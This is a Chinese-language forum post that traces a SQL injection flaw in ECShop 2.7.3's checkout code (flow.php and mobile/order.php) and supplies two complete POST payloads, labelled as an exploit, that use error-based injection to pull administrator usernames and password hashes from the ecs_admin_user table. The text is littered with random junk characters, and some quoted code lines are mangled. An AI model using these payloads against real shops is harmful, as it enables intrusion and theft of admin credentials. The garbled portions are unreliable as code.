前段时间大概2012年圣诞节左右,在t00ls上看见ecshop全版本注入,当时也下载了最新的程序分析了下,最近考试比较忙,今天刚考完,把我分析的记录下来。 ~" P) Z2 f, o" Q
$ X$ u/ t+ u! m% h& t
漏洞关键文件: z( y' _( |9 R( E. v
" d8 _* a4 L; x, y4 `
/includes/lib_order.php
3 l; G- a: P4 W) l: r1 h% p% e3 ]9 }; C2 M7 H4 `/ n
关键函数:2 M, j& r2 ?% }7 I, p$ ~0 O/ n
- c5 ?$ w: g% z# Z& B! M* f3 j! ~ + o' G+ T/ j I$ X/ c
3 y% `5 _4 f4 J# | z5 C- o' q4 o
01 function available_shipping_list($region_id_list) , B- l) L- z p9 m6 l7 a w2 X% k
. K+ W: Q3 T( w8 u e02 {
) d' x3 c' S7 @* R
# R2 X; e( J% I: l& C0 S03 $sql = 'SELECT s.shipping_id, s.shipping_code, s.shipping_name, ' .
. t5 _. I: ~6 C4 Y
\2 f( g) h& t5 O04 's.shipping_desc, s.insure, s.support_cod, a.configure ' . & S! U/ F h% j3 g) {/ T
- ~+ x1 t0 J* {: {0 ~$ r# c
05 'FROM ' . $GLOBALS['ecs']->table('shipping') . ' AS s, ' .
- \& c2 f6 }& b5 [ u8 X2 Q' ~- i) t/ p; ?2 {
06 $GLOBALS['ecs']->table('shipping_area') . ' AS a, ' . . _2 m+ ^! o4 W4 F" a! m: w) [
; }: z/ d" F ~1 d
07 $GLOBALS['ecs']->table('area_region') . ' AS r '.
; m, n" Z5 k# I$ B! K% L$ ]. L. _ U. R$ V m' A; b! B
08 'WHERE r.region_id ' . db_create_in($region_id_list) . 8 _1 h- j5 H% q
. n" C' e6 B- S, E, T09 ' AND r.shipping_area_id = a.shipping_area_id AND a.shipping_id = s.shipping_id AND s.enabled = 1 ORDER BY s.shipping_order'; ' R. I8 J/ `" P. P. Q
) O# {* L u* f
10
; E' N: T& H) ]1 i) [8 J2 F; G
9 o4 l7 e9 ~& @% X& J+ q# _11 return $GLOBALS['db']->getAll($sql); " V/ S' W' P8 u
+ {$ z: Q3 e) A* [: D; M5 t12 } , m; J3 c2 `6 }1 {0 i
( X6 e- I; t; N9 P4 Q
显然对传入的参数没有任何过滤就带入了查询语句。 k+ v& I7 o7 m3 E! }$ z) w+ s
8 j* K# ]2 S1 o3 P' S
下面我们追踪这个函数在flow.php中:8 v& a5 J& {; Y% ~" h& J7 {" x/ t
第531行: 4 T; ?" z- y2 T! e) s% y; K3 i# h
6 {" p" x; |5 v" \
1 $shipping_list = available_shipping_list($region);
" i: u; [3 z. F! y
& x& N6 |( ?" t5 l9 P E3 L
! s# j/ }/ N* A; \* A. ?) Z
' t3 x6 j' s/ w# F4 Z ) N/ ^: A l% ?; |2 `6 a# h
( T. r- m7 c$ z( a再对传入变量进行追踪:
V4 H. f* f$ i0 D( m; j M4 O$ y$ h5 Q
第530行:
+ o* {0 k) c+ j1 k) Z6 K( }0 V/ A
, h# r& e" r8 q# F1 $region = array($consignee['country'], $consignee['province'],$consignee['city'], $consignee['district']);
3 K8 Z5 u6 {7 k1 K' w( `1 r$ O# b1 Q( N8 E* b2 [+ V3 J4 |
) P/ o0 C% N* k1 ^
9 C: v9 {2 Z" V" f' m
5 K9 W4 {$ h! \* S
+ N$ h* ?0 [# N/ a: E. R第473行: ) _7 n7 [7 F+ |6 M
( s9 j1 X9 W# A) T. ~* b0 p1 $consignee = get_consignee($_SESSION['user_id']); 5 X F# |3 s. F n* U% H3 N
( c! X% [3 G& |7 \
到了一个关键函数:
( b0 p1 |; J; H/ f! p5 k; U: `4 n! [) q3 f* y K
/includes/lib_order.php
8 A+ s9 ~; o9 ^+ E+ W b, n
8 V6 b" r2 x$ B- g! e
/ a, `+ A1 o% \8 }
( e L0 Y3 k3 ~ 1 j& e$ P8 N/ O O$ f
. h6 |0 J# k0 W& y" C) |. ?01 function get_consignee($user_id) ; Z9 e0 o# v2 `* J9 W7 N
& o6 g5 g: g6 w+ ?) S1 B- J
02 { 1 w; U9 s; k7 r$ C X
! x" n; b$ N1 R# g) n0 ^03 if (isset($_SESSION['flow_consignee']))
( s( s# t, C4 }/ H+ v8 |3 |" {1 @1 \% l! o- E
04 {
" k3 Z; w+ T# @; U3 b h) @4 Z
# N* S5 g+ S: c. k) Q. q/ k05 /* 如果存在session,则直接返回session中的收货人信息 */
8 t: {/ i2 [( ?# b) Q1 ^* S/ T, s2 B( \
& o& n4 l7 d. ^) S* N# ^" {06
2 e2 @" h% F" W: P! N7 R3 }/ A [3 M; N2 q' i
07 return $_SESSION['flow_consignee']; ( s$ O. L4 ]. |$ {/ S9 Q( B
3 x! O3 l G ~: X0 ^
08 } A ?, j5 e! j# l, B P+ a
" o$ X3 U: k' d7 ~. ]: S09 else / i' S8 F/ E) h, p8 i% x
7 x/ t' q. U: G4 H; R" N5 l$ F
10 { , M7 a6 h- J* C; l3 o8 D* G
/ r8 r" [; q" e: \0 }! V* r* y1 u' U. j
11 /* 如果不存在,则取得用户的默认收货人信息 */ , r1 q# |) C4 A' B8 u
" T! F( @6 s% G7 K
12 $arr = array();
: x6 n( C" h9 q) {/ S. M- P; q- T5 b+ _
& G& X1 @5 G, ]# W8 q0 i13
7 K) n& Z8 E. D9 i/ p m3 Z8 }- G* q9 H
14 if ($user_id > 0) ! F; d: T& ~% ^/ Z' v. i* f/ l
( {" {: o/ j& q9 i0 S2 ?6 H
15 {
2 h9 c9 l" ?9 X% p j2 R% e" U
" k( t" x# e( b% o% \ r16 /* 取默认地址 */
* ~* `7 x3 v; B- }2 v& ?/ ]" \2 K, _( T& O5 h1 X: U
17 $sql = "SELECT ua.*".
F- f% t5 S1 b2 g5 z, {5 [, C
/ m) |# I) t. G+ M' j, }$ [4 q18 " FROM " . $GLOBALS['ecs']->table('user_address') . "AS ua, ".$GLOBALS['ecs']->table('users').' AS u '. 4 m3 b! p' r7 k7 h1 Z! T# V
4 D2 N' |' v' t% T9 O
19 " WHERE u.user_id='$user_id' AND ua.address_id = u.address_id"; , m* f4 `3 N% g( W# p5 [; {; x. o
, E4 G; t: U6 v& c3 { b% |20 % ?. U6 g7 M: I& h8 c3 n+ ?, E
Z- x: X" p8 U+ T
21 $arr = $GLOBALS['db']->getRow($sql); 1 c" d+ V& _0 s* S! y) i' ?
3 n) t* @4 Z. ~1 u8 G- a6 U22 } " w* k/ y/ f9 R+ ]5 G
3 Q( {8 [7 h5 |8 N9 ]
23 ) U, A3 Q7 [& P
5 R! D0 o; {: T2 ~, E/ O8 G0 B. p24 return $arr;
5 \3 G) x! C( ]) e! P3 D0 n7 Q. }9 u9 N+ C. T; w- K- P
25 } ; Z. _: H7 |: a4 `5 \6 s
+ M0 q8 K: F1 L' _% G' h: z& t
26 } % X0 z N- m4 P6 @" g
6 G p& f& f i0 P
显然如果 isset($_SESSION['flow_consignee']存在就直接使用。到底存不存在呢?
0 G! P) Q! b' o5 ^! C3 j
3 b6 S3 m$ c1 q 1 r6 q+ @% `% }1 I. O" i/ G
4 z$ v+ C% W& e5 O% S; j
关键点:' k4 _. e( ^, k) ]5 Z9 S4 R E
# C! F, r# v" @( d0 d/ ^
第400行: $_SESSION['flow_consignee'] = stripslashes_deep($consignee); M/ h( }( \) D5 l* d
" q6 h2 |, \9 u1 p
这里对传入参数反转义存入$_SESSION中。# Q5 U3 c6 i2 H. @. ^
7 k! g, h8 N" r/ L# A4 ? 1 `' g6 F2 s( z, _9 n
. W1 Q% b+ N( s5 ?9 |+ C. @( N
然后看下:. T' B- F8 o0 c1 X( S
" x- \; J# j5 C4 y6 m
" ~# M4 A/ z2 l5 U) S
! k9 z1 ^3 P# ^1 t" F ; ~( X! g1 U2 U! g
$ v' b b" X- O I! w
01 $consignee = array(
' y/ _" Q' O' _$ r( e' T: l" C2 ?5 J) P/ ~0 f
02 'address_id' => empty($_POST['address_id']) ? 0 :intval($_POST['address_id']),
. j% ]* ?! o2 x# z( V5 ^+ N q0 o7 ]7 d: E' i( y) _$ M0 ~
03 'consignee' => empty($_POST['consignee']) ? '' : trim($_POST['consignee']),
" U4 {) l1 R6 ]! ~7 z$ f8 K7 ^) G( b- r! n; S+ ?
04 'country' => empty($_POST['country']) ? ''  _POST['country'],
9 a }- d$ X9 m( {3 p: r- O( r% H# e; H( A
05 'province' => empty($_POST['province']) ? '' _POST['province'],
h) q' h4 M5 B. H8 B+ |" T9 k0 u: _: a, f# B& ]3 w
06 'city' => empty($_POST['city']) ? '' _POST['city'],
+ |+ e) @ Q$ L0 M4 o/ w2 h1 G8 y0 p) O! k7 \, Q5 g
07 'district' => empty($_POST['district']) ? '' _POST['district'], 1 m0 n2 Y; _1 Y1 b5 L$ l9 Q6 a& \
. H6 t; H/ m& |4 Y: S+ w
08 'email' => empty($_POST['email']) ? '' _POST['email'],
0 q/ O4 e* i7 w# Q( v/ O& Z. M- {8 d, h4 D5 ^' K A. N- ^* k
09 'address' => empty($_POST['address']) ? '' _POST['address'], 9 Z$ o3 q, d. T' P
- x9 J! o- a9 V3 n# b# B10 'zipcode' => empty($_POST['zipcode']) ? '' : make_semiangle(trim($_POST['zipcode'])), % s/ o/ i5 ]1 Y+ b/ P
$ u3 y% s' h2 P2 T$ J11 'tel' => empty($_POST['tel']) ? '' : make_semiangle(trim($_POST['tel'])),
& |- l* F, `* k4 X! w# k" g4 t0 c* L* T `
12 'mobile' => empty($_POST['mobile']) ? '' : make_semiangle(trim($_POST['mobile'])),
; e8 y2 h( L6 U7 J5 H4 |4 F* O
3 s. D b( E" |% L- I: w$ e13 'sign_building' => empty($_POST['sign_building']) ? '' _POST['sign_building'],
5 d ]/ e f* }! t% L5 a: K, f5 x% ]% @
14 'best_time' => empty($_POST['best_time']) ? '' _POST['best_time'], # l u: _' @% h8 M7 n _
8 m" ?/ P2 W+ E; a1 k15 ); 7 ^2 M0 v0 m, W7 n4 ?4 j, M
. C" C# m% r; |/ v1 I, Q) Z
好了注入就这样出现了。
* Q4 v& {) Z8 X' f% z# s6 o3 v" p, ?) P$ T
==================% h, _& v( v9 h2 U) F4 t
- w5 U! y& y/ T: G* R注入测试:7 g* O6 [7 s) _! k# q& M# F0 ], ~
5 t2 L3 e9 W7 F8 _" p0 R- `! ^) l环境:windows7+xampp1.7.7(Apache2.2.21+Php 5.3.8+Mysql 5.5.16)
3 _7 h0 ], B5 f1 z: z7 o* Q1 z9 n* y9 M) U! a! V) d! t. U9 B
测试程序:ECShop_V2.7.3_UTF8_release1106$ i- I$ Z2 ~/ F* i- k
3 ^! a0 y0 [. v* Y. v( n+ H % z2 W7 \* W) d; T2 f
' L3 R. O. H+ _8 p1.首先需要点击一个商品加入购物车5 V" m* T5 {+ [5 b, {# \1 V7 |
* _1 ~4 U* [. k- `2.注册一个会员帐号
' p* O( {$ _5 ? i- ?: [6 g8 Z9 J3 s( S H* X2 n
3.post提交数据
# a4 z$ ~6 E* l! V, u+ d( Y, X
, L1 ~1 v; a+ O: B; T
1 C% W$ O. {6 @ Z/ m
1 http://127.0.0.1/ecshop/flow.php
- K6 v" p5 l0 ]" U6 v& E# V4 | j9 [; T- ]4 P
2 . N. @: m8 A9 M
/ K) K- X4 Q- D3 h
3 country=1&province=3') and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 #&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111&mobile=11111111&sign_building=111111111&best_time=111111111&Submit=%E9%85%8D%E9%80%81%E8%87%B3%E8%BF%99%E4%B8%AA%E5%9C%B0%E5%9D%80&step=consignee&act=checkout&address_id= , o! X \0 Q0 p) B
举一反三,我们根据这个漏洞我们可以继续深入挖掘:
, o: }8 `' K3 f1 f* A8 i& M: g) v7 C' o! U" c% f% z+ W% H7 Y
我们搜寻关键函数function available_shipping_list()# ^% B& @* m: a6 Y
* w2 \5 i1 e l8 i5 _$ ?在文件/moblie/order.php中出现有,次文件为手机浏览文件功能基本和flow.php相同,代码流程基本相同9 R7 |( K/ ~7 j$ y$ i
! E+ P5 P: W6 D6 R5 Y
利用exp:. l5 ], J1 U/ c: a" @
, A9 l# ?1 v. S9 d5 g/ z
1.点击一个商品,点击购买商标" X7 a+ Z* D, ?! h! B- F
0 V* h3 o! _. l8 M+ ^' Q2.登录会员帐号6 H' Y0 B3 ^ y* H* c3 U
! j. k7 J0 }4 K/ M# d% q7 U ^- J
3.post提交:" O# S2 j7 L; X: ~6 j( Y" K' g
7 U4 R4 d5 M' p3 l) E$ nhttp://127.0.0.1/ecshop/mobile/order.php# Z( j: Z/ ^# o& g
" F4 L8 o$ L( [- s: `& D6 f , N2 J* S/ e; J
- v5 E' C. @0 B" [! ucountry=1&province=3') and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 #&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111&mobile=11111111&sign_building=111111111&best_time=111111111&Submit=%E9%85%8D%E9%80%81%E8%87%B3%E8%BF%99%E4%B8%AA%E5%9C%B0%E5%9D%80&&act=order_lise&address_id=
& b3 f/ S! v0 Z- D/ x( H( Z- U- W6 M; f* s8 |" P# Z. M
|
发表于 2013-1-13 09:48:03
收藏
分享
支持
反对